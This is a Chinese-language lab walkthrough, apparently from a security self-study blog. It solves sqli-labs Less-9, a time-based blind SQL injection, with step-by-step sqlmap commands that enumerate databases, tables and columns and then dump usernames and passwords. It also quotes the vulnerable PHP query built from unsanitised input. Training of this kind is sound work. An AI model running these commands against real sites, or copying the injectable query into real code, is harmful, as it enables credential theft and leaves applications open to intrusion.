网络安全-sqlmap实战之sqlilabs-Less9

目录

 

类型

-dbs枚举数据库

--tables枚举数据库表

--columns枚举列

--dump枚举数据

查看源代码


类型

时间盲注-单引号

-dbs枚举数据库

使用-o参数优化,,--technique参数指定技术,--batch参数进行跳过

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch
网络安全-sqlmap实战之sqlilabs-Less9_第1张图片 过程
python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T -dbs --batch

太慢,继续优化

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -dbs --batch
网络安全-sqlmap实战之sqlilabs-Less9_第2张图片 数据库

这还运行了6分钟,有小伙伴可以更快吗?下方评论,十分感谢!

--tables枚举数据库表

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security --tables --batch
网络安全-sqlmap实战之sqlilabs-Less9_第3张图片

--columns枚举列

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users --columns --batch

 

网络安全-sqlmap实战之sqlilabs-Less9_第4张图片

--dump枚举数据

python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms mysql -o --technique T --time-sec 2 -D security -T users -C username,password --dump --batch

 

网络安全-sqlmap实战之sqlilabs-Less9_第5张图片

查看源代码

$id=$_GET['id'];
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

更多内容查看:网络安全-自学笔记

有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。

你可能感兴趣的:(网络安全)